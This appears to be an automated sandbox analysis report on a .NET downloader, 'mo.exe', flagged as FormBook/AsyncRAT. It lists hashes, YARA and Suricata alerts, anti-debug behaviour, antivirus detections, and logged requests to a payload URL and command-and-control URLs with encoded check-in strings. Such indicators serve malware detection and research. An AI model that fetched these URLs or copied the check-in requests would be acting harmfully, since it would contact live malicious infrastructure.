Summary | ZeroBOX

mo.exe

AntiVM PE32 AntiDebug PE File .NET EXE
Category: FILE
Machine: s1_win7_x6401
Started: May 20, 2022, 1:13 p.m.
Completed: May 20, 2022, 1:15 p.m.
Size 45.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e1ca14960f10e03626452fffbe57a87f
SHA256 5d0afd545a7691aa9db609487e20297ce8b7e9c5428599fb323f53ad28fba089
CRC32 61632CF7
ssdeep 384:Mue0eCevzIBQpB+P6Vka2U9oXgfndiHBDuLVaI791xkEpYT2MwU6k2lrP6fPRzfX:NkOdUWXgssVDd6g6z1cMn6iR
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

IP Address Status Action
164.124.101.2 Active Moloch
192.185.174.177 Active Moloch
216.239.32.21 Active Moloch
54.38.220.85 Active Moloch

Suricata Alerts

Flow | SID | Signature | Category
UDP 192.168.56.101:55871 -> 164.124.101.2:53 | 2025107 | ET INFO DNS Query for Suspicious .cf Domain | Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 192.185.174.177:80 | 2031092 | ET HUNTING Request to .CF Domain with Minimal Headers | Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 54.38.220.85:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 54.38.220.85:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 54.38.220.85:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 216.239.32.21:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API | Arguments | Status | Return | Repeated

WriteConsoleW
  buffer: Waiting for 2
  console_handle: 0x00000007
  Status: 1 | Return: 1 | Repeated: 0

WriteConsoleW
  buffer: seconds, press a key to continue ...
  console_handle: 0x00000007
  Status: 1 | Return: 1 | Repeated: 0

suspicious_features: GET method with no useragent header
suspicious_request: GET http://uacdrc.cf/m/Hjacjj_Saknuvuf.png

suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.sverigeochvarlden.com/rx29/?X48xI8ZX=9OJdw6AqaLFu2CpTEaL60IC+kV8XOuE0/iJQW1PtG6+ocC4VtnQuwuhzCtKdssjBA9XKIvBj&Ez=ltCpO81

suspicious_features: GET method with no useragent header
suspicious_request: GET http://www.coastalprecisionpainting.com/rx29/?X48xI8ZX=zHCO7pkqkEsXRaEtaq3NMLg2kEfwcfvgNPJNt7zNRAQ1QSuaywxNqZAS3bVTeKiTQ+PvBfZw&Ez=ltCpO81

request: GET http://uacdrc.cf/m/Hjacjj_Saknuvuf.png
request: GET http://www.sverigeochvarlden.com/rx29/?X48xI8ZX=9OJdw6AqaLFu2CpTEaL60IC+kV8XOuE0/iJQW1PtG6+ocC4VtnQuwuhzCtKdssjBA9XKIvBj&Ez=ltCpO81
request: GET http://www.coastalprecisionpainting.com/rx29/?X48xI8ZX=zHCO7pkqkEsXRaEtaq3NMLg2kEfwcfvgNPJNt7zNRAQ1QSuaywxNqZAS3bVTeKiTQ+PvBfZw&Ez=ltCpO81
Time & API | Arguments | Status | Return | Repeated

NtAllocateVirtualMemory
  process_identifier: 1112
  region_size: 3158016
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x008a0000
  allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
  process_handle: 0xffffffff
  Status: 1 | Return: 0 | Repeated: 0

Time & API | Arguments | Status | Return | Repeated

LookupPrivilegeValueW
  system_name:
  privilege_name: SeDebugPrivilege
  Status: 1 | Return: 1 | Repeated: 0

Description | Rule
(no description) | DebuggerCheck__GlobalFlags
(no description) | DebuggerCheck__QueryInfo
(no description) | DebuggerHiding__Thread
(no description) | DebuggerHiding__Active
(no description) | ThreadControl__Context
(no description) | SEH__vectored
Checks if being debugged | anti_dbg
Bypass DEP | disable_dep

Antivirus Vendor | Detection
Bkav W32.AIDetectNet.01
Lionic Trojan.Multi.Generic.4!c
tehtris Generic.Malware
MicroWorld-eScan Trojan.GenericKD.50306070
FireEye Generic.mg.e1ca14960f10e036
McAfee RDN/Generic Downloader.x
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
Alibaba Trojan:MSIL/DropperX.35e5fc16
Arcabit Trojan.Generic.D2FF9C16
BitDefenderTheta Gen:NN.ZemsilF.34682.cm0@aWkkFDl
Cyren W32/ABRisk.GJSP-9130
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.JDM
TrendMicro-HouseCall TROJ_GEN.R002H0CEI22
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender Trojan.GenericKD.50306070
Avast Win32:DropperX-gen [Drp]
Tencent Msil.Trojan-downloader.Agent.Akfa
Ad-Aware Trojan.GenericKD.50306070
Emsisoft Trojan.GenericKD.50306070 (B)
F-Secure Heuristic.HEUR/AGEN.1249297
McAfee-GW-Edition Artemis!Trojan
SentinelOne Static AI - Malicious PE
Sophos Mal/Generic-S
APEX Malicious
Avira HEUR/AGEN.1249297
Gridinsoft Ransom.Win32.Wacatac.sa
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm HEUR:Trojan-Spy.MSIL.Noon.gen
GData Trojan.GenericKD.50306070
Cynet Malicious (score: 100)
MAX malware (ai score=83)
Malwarebytes Trojan.MCrypt.MSIL.Generic
Ikarus Trojan-Spy.Vidar
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.LVE!tr.dldr
AVG Win32:DropperX-gen [Drp]
CrowdStrike win/malicious_confidence_90% (W)